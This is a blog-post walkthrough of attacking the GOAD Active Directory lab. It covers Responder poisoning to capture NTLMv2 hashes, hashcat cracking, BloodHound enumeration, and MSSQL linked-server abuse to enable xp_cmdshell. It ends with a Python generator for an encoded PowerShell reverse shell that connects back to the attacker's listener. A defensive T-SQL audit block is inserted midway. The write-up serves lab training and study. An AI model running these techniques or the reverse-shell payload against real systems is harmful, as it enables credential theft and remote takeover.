Responder

When no valid account has been obtained on a network, Responder can be used to capture NTLM hashes while monitoring the network interface. After running Responder for a while, SMB connection attempts to Bravos and Meren by the NORTH\robb.stark and NORTH\eddard.stark accounts respectively can be sniffed, as shown below.

The hosts Bravos and Meren do not actually exist; Braavos and Meereen do. When a DNS lookup fails, Windows falls back to LLMNR (Link-Local Multicast Name Resolution) for local name resolution, and that is where the NTLM hash can be captured.

┌──(root㉿kali)-[~/Desktop/GOAD/kerberoasting]
└─# responder -I eth1
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CTRL-C
...
...
...
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name BRAVOS (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Bravos.local
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos.local
[*] [LLMNR]  Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Bravos.local
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Bravos
[*] [LLMNR]  Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Bravos.local
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Bravos
[SMB] NTLMv2-SSP Client   : fe80::a4b3:158:af4f:d85a
[SMB] NTLMv2-SSP Username : NORTH\robb.stark
[SMB] NTLMv2-SSP Hash     : robb.stark::NORTH:a7dfb147661e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
...
...
...
[*] [LLMNR]  Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Meren.local
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren.local
[*] [NBT-NS] Poisoned answer sent to 192.168.56.11 for name MEREN (service: File Server)
[*] [MDNS] Poisoned answer sent to 192.168.56.11   for name Meren.local
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Meren
[*] [MDNS] Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren.local
[*] [LLMNR]  Poisoned answer sent to fe80::a4b3:158:af4f:d85a for name Meren
[*] [LLMNR]  Poisoned answer sent to 192.168.56.11 for name Meren
[SMB] NTLMv2-SSP Client   : fe80::a4b3:158:af4f:d85a
[SMB] NTLMv2-SSP Username : NORTH\eddard.stark
[SMB] NTLMv2-SSP Hash     : eddard.stark::NORTH:2e05ff37b12c53f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

Attempting to crack the two captured NTLMv2 hashes with hashcat, robb.stark's NTLMv2 hash was cracked and its password recovered, but eddard.stark's password could not be cracked. This brought the total to five accounts.

  • north.sevenkingdoms.local\samwell.tarly:Heartsbane (User Description)
  • north.sevenkingdoms.local\hodor:hodor (Password Spray)
  • north.sevenkingdoms.local\brandon.stark:iseedeadpeople (AS-REP Roasting)
  • north.sevenkingdoms.local\jon.snow:iknownothing (Kerberoasting)
  • north.sevenkingdoms.local\robb.stark:sexywolfy (Responder)
┌──(root㉿kali)-[~/Desktop/GOAD]
└─# hashcat -m 5600 -a 0 ntlmv2.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-sandybridge-12th Gen Intel(R) Core(TM) i9-12900KF, 2914/5892 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 2 digests; 2 unique digests, 2 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

ROBB.STARK::NORTH:a7dfb147661e0038:d14dcafa720a1538e2c79c6908c788ad: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:sexywolfy
Approaching final keyspace - workload adjusted.


Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ntlmv2.txt
Time.Started.....: Tue Jan  9 22:59:38 2024 (34 secs)
Time.Estimated...: Tue Jan  9 23:00:12 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   539.7 kH/s (0.72ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/2 (50.00%) Digests (total), 1/2 (50.00%) Digests (new), 1/2 (50.00%) Salts
Progress.........: 28688770/28688770 (100.00%)
Rejected.........: 0/28688770 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 80%

Started: Tue Jan  9 22:59:37 2024
Stopped: Tue Jan  9 23:00:14 2024

BloodHound

So far, a total of five valid accounts have been obtained. Now, to understand the whole AD structure with BloodHound, the data to load into it must be collected. bloodhound-python can collect data for all three domains.

sevenkingdoms.local

┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'sevenkingdoms.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'kingslanding.sevenkingdoms.local'  -ns '192.168.56.10' -c All --zip
INFO: Found AD domain: sevenkingdoms.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local
INFO: Found 16 users
INFO: Found 59 groups
INFO: Found 2 gpos
INFO: Found 9 ous
INFO: Found 19 containers
INFO: Found 2 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: kingslanding.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20240109204632_bloodhound.zip

north.sevenkingdoms.local

┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'north.sevenkingdoms.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'winterfell.north.sevenkingdoms.local'  -ns '192.168.56.11' -c All --zip
INFO: Found AD domain: north.sevenkingdoms.local
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 1 domains
INFO: Found 2 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local
INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local
INFO: Found 17 users
INFO: Found 51 groups
INFO: Found 3 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: castelblack.north.sevenkingdoms.local
INFO: Querying computer: winterfell.north.sevenkingdoms.local
INFO: Done in 00M 01S
INFO: Compressing output into 20240109204815_bloodhound.zip

essos.local

Running bloodhound-python against the essos.local domain produced the error below. After looking into it, it appeared to be a time synchronization problem.

┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'essos.local' -u 'samwell.tarly@north.sevenkingdoms.local' -p 'Heartsbane' -dc 'meereen.essos.local'  -ns '192.168.56.12' -c All --zip
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
Traceback (most recent call last):
  File "/usr/bin/bloodhound-python", line 33, in <module>
    sys.exit(load_entry_point('bloodhound==1.6.1', 'console_scripts', 'bloodhound-python')())
             ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/bloodhound/__init__.py", line 332, in main
    auth.get_tgt()
  File "/usr/lib/python3/dist-packages/bloodhound/ad/authentication.py", line 214, in get_tgt
    tgs, cipher, _, sessionkey = getKerberosTGS(servername, self.domain, self.kdc,
                                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20231106.134307.9aa93730-py3.11.egg/impacket/krb5/kerberosv5.py", line 447, in getKerberosTGS
    r = sendReceive(message, domain, kdcHost)
        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20231106.134307.9aa93730-py3.11.egg/impacket/krb5/kerberosv5.py", line 91, in sendReceive
    raise krbError
impacket.krb5.kerberosv5.KerberosError: Kerberos SessionError: KRB_AP_ERR_BAD_INTEGRITY(Integrity check on decrypted field failed)

After some trial and error, the issue was resolved by upgrading bloodhound-python. The version previously in use was 1.7.0; after upgrading with the command pip3 install bloodhound --upgrade, the bloodhound-python version is 1.7.2.

┌──(root㉿kali)-[~/Desktop/GOAD/BloodHound]
└─# bloodhound-python -d 'essos.local' -u 'brandon.stark@north.sevenkingdoms.local' -p 'iseedeadpeople' -dc 'meereen.essos.local' -ns '192.168.56.12' -c All --zip
INFO: Found AD domain: essos.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: meereen.essos.local
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 3 gpos
INFO: Found 2 ous
INFO: Found 19 containers
INFO: Found 1 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: braavos.essos.local
INFO: Querying computer: meereen.essos.local
INFO: Done in 00M 00S
INFO: Compressing output into 20240109214455_bloodhound.zip


castelblack.north.sevenkingdoms.local (192.168.56.22)

In the previous post, the port scan showed that the CASTELBLACK host is serving MSSQL (1433/tcp). This could also be confirmed with netexec, as shown below.

┌──(root㉿kali)-[~/Desktop/GOAD]
└─# netexec mssql '192.168.56.22'
MSSQL       192.168.56.22   1433   CASTELBLACK      [*] Windows 10.0 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)

Next, to find out whether the 5 accounts obtained above can access this MSSQL instance, the command below was used. All of the obtained users could authenticate, and among them the jon.snow account appears to have local administrator access (Pwn3d!).

┌──(root㉿kali)-[~/Desktop/GOAD/DC02]
└─# crackmapexec mssql '192.168.56.22' -u pwn-users.txt -p pwn-passwords.txt --no-bruteforce --continue-on-success
MSSQL       192.168.56.22   1433   CASTELBLACK      [*] Windows 10.0 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local)
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\hodor:hodor
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\brandon.stark:iseedeadpeople
MSSQL       192.168.56.22   1433   CASTELBLACK      [+] north.sevenkingdoms.local\jon.snow:iknownothing (Pwn3d!)

impacket's mssqlclient can be used to access MSSQL with the jon.snow account. Enumerating the MSSQL databases shows only the default databases.

┌──(root㉿kali)-[~/Desktop/GOAD/Vuln/MSSQL-Trusted-Links]
└─# impacket-mssqlclient 'north.sevenkingdoms.local/jon.snow:iknownothing@192.168.56.22' -windows-auth
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (NORTH\jon.snow  dbo@master)> enum_db
name     is_trustworthy_on
------   -----------------
master                   0

tempdb                   0

model                    0

msdb                     1

Running the enum_logins command executes the query below, and the result confirms that the logged-in jon.snow account is a sysadmin.

select r.name,r.type_desc,r.is_disabled, sl.sysadmin, sl.securityadmin, 
sl.serveradmin, sl.setupadmin, sl.processadmin, sl.diskadmin, sl.dbcreator, sl.bulkadmin 
from  master.sys.server_principals r 
left join master.sys.syslogins sl on sl.sid = r.sid 
where r.type in ('S','E','X','U','G')
SQL (NORTH\jon.snow  dbo@master)> enum_logins
name                                 type_desc       is_disabled   sysadmin   securityadmin   serveradmin   setupadmin   processadmin   diskadmin   dbcreator   bulkadmin
----------------------------------   -------------   -----------   --------   -------------   -----------   ----------   ------------   ---------   ---------   ---------
sa                                   SQL_LOGIN                 0          1               0             0            0              0           0           0           0

##MS_PolicyEventProcessingLogin##    SQL_LOGIN                 1          0               0             0            0              0           0           0           0

##MS_PolicyTsqlExecutionLogin##      SQL_LOGIN                 1          0               0             0            0              0           0           0           0

NORTH\sql_svc                        WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

NT SERVICE\SQLWriter                 WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

NT SERVICE\Winmgmt                   WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

NT SERVICE\MSSQL$SQLEXPRESS          WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

CASTELBLACK\vagrant                  WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

BUILTIN\Users                        WINDOWS_GROUP             0          0               0             0            0              0           0           0           0

NT AUTHORITY\SYSTEM                  WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

NT SERVICE\SQLTELEMETRY$SQLEXPRESS   WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

NORTH\jon.snow                       WINDOWS_LOGIN             0          1               0             0            0              0           0           0           0

NORTH\samwell.tarly                  WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

NORTH\brandon.stark                  WINDOWS_LOGIN             0          0               0             0            0              0           0           0           0

Running the enum_links command shows the MSSQL trusted links. The command executes the following queries.

EXEC sp_linkedservers
EXEC sp_helplinkedsrvlogin

Checking the trusted links shows a link to the MSSQL instance on BRAAVOS, which belongs to the essos.local domain, and that the jon.snow account is mapped to the sa account on that link.

SQL (NORTH\jon.snow  dbo@master)> enum_links
SRV_NAME                 SRV_PROVIDERNAME   SRV_PRODUCT   SRV_DATASOURCE           SRV_PROVIDERSTRING   SRV_LOCATION   SRV_CAT
----------------------   ----------------   -----------   ----------------------   ------------------   ------------   -------
BRAAVOS                  SQLNCLI                          braavos.essos.local      NULL                 NULL           NULL

CASTELBLACK\SQLEXPRESS   SQLNCLI            SQL Server    CASTELBLACK\SQLEXPRESS   NULL                 NULL           NULL

Linked Server            Local Login      Is Self Mapping   Remote Login
----------------------   --------------   ---------------   ------------
BRAAVOS                  NULL                           1   NULL

BRAAVOS                  NORTH\jon.snow                 0   sa

CASTELBLACK\SQLEXPRESS   NULL                           1   NULL

We are currently connected to the MSSQL instance on CASTELBLACK (192.168.56.22) as jon.snow, and through the BRAAVOS (192.168.56.23) link above we can run SQL queries or OS commands on braavos.essos.local.
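
The sysadmin membership and the jon.snow to sa link mapping shown above are exactly what a defender should audit for. The following T-SQL is an added example, not part of the original post or of impacket: it lists sysadmin members, linked-server login mappings that are not self-mapped or have RPC OUT enabled, and the xp_cmdshell setting, then removes the mapping and disables RPC OUT on the link. It assumes sysadmin access on the CASTELBLACK instance and uses only standard SQL Server catalog views and system procedures; BRAAVOS and NORTH\jon.snow are the names from the output above.

```sql
-- Added audit script (not from the original post). Run on the CASTELBLACK
-- instance as a sysadmin; all views and procedures are standard SQL Server.

-- 1. Who holds sysadmin? Domain user logins such as NORTH\jon.snow are the
--    first thing to review; service accounts rarely need it either.
SELECT sp.name, sp.type_desc, sp.is_disabled
FROM sys.server_principals AS sp
WHERE IS_SRVROLEMEMBER('sysadmin', sp.name) = 1
  AND sp.type IN ('S', 'U', 'G');

-- 2. Linked-server login mappings. uses_self_credential = 0 with a fixed
--    remote_name (for example 'sa') lets the mapped local login act as that
--    remote account; local_principal_id = 0 means "all other logins".
--    EXEC ... AT <server> only works when RPC OUT is enabled on the link.
SELECT s.name AS linked_server,
       s.data_source,
       COALESCE(lp.name, '<all other logins>') AS local_login,
       ll.uses_self_credential,
       ll.remote_name,
       s.is_rpc_out_enabled
FROM sys.servers AS s
JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
       ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
  AND (ll.uses_self_credential = 0 OR s.is_rpc_out_enabled = 1);

-- 3. Is xp_cmdshell enabled on this instance? (value_in_use = 1 means yes)
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

-- Remediation for the finding above: drop the explicit jon.snow -> sa
-- mapping and disable RPC OUT so that EXEC ... AT BRAAVOS no longer works.
EXEC sp_droplinkedsrvlogin @rmtsrvname = N'BRAAVOS', @locallogin = N'NORTH\jon.snow';
EXEC sp_serveroption @server = N'BRAAVOS', @optname = N'rpc out', @optvalue = N'false';

-- On the remote instance (BRAAVOS) itself, turn xp_cmdshell back off.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
```

Re-run query 2 after the changes: the BRAAVOS row for NORTH\jon.snow should be gone and is_rpc_out_enabled should read 0.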

Using the use_link command as shown below, the following queries were actually executed: after connecting to BRAAVOS, OS commands could be run through the xp_cmdshell stored procedure.

EXEC ('select system_user as "username"') AT BRAAVOS
EXEC ('exec master.dbo.sp_configure ''show advanced options'',1;RECONFIGURE;exec master.dbo.sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT BRAAVOS
EXEC ('exec master..xp_cmdshell ''whoami''') AT BRAAVOS

When commands are executed through the link, they run with the privileges of essos.local/sql_svc.

SQL (NORTH\jon.snow  dbo@master)> use_link BRAAVOS
SQL >BRAAVOS (sa  dbo@master)> xp_cmdshell whoami
output
-------------
essos\sql_svc

Next, the code below can be used to build a command that establishes a reverse connection via powershell.

#!/usr/bin/env python
import base64
import sys

if len(sys.argv) < 3:
  print('usage : %s ip port' % sys.argv[0])
  sys.exit(0)

payload="""
$c = New-Object System.Net.Sockets.TCPClient('%s',%s);
$s = $c.GetStream();[byte[]]$b = 0..65535|%%{0};
while(($i = $s.Read($b, 0, $b.Length)) -ne 0){
    $d = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);
    $sb = (iex $d 2>&1 | Out-String );
    $sb = ([text.encoding]::ASCII).GetBytes($sb + 'ps> ');
    $s.Write($sb,0,$sb.Length);
    $s.Flush()
};
$c.Close()
""" % (sys.argv[1], sys.argv[2])

byte = payload.encode('utf-16-le')
b64 = base64.b64encode(byte)
print("powershell -exec bypass -enc %s" % b64.decode())

When the generated reverse connection command is passed through xp_cmdshell, powershell connects back to the port on which the attacker is listening.

SQL >BRAAVOS (sa  dbo@master)> xp_cmdshell powershell -exec bypass -enc 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
┌──(root㉿kali)-[~/Desktop/GOAD/Vuln/MSSQL-Trusted-Links]
└─# nc -lvnp 30000
listening on [any] 30000 ...
connect to [192.168.56.31] from (UNKNOWN) [192.168.56.23] 58245
whoami
essos\sql_svc

In this way, 5 accounts were obtained from the north.sevenkingdoms.local domain, and a shell as sql_svc was obtained in the essos.local domain. This post ends here :)

This post is licensed under CC BY 4.0 by the author.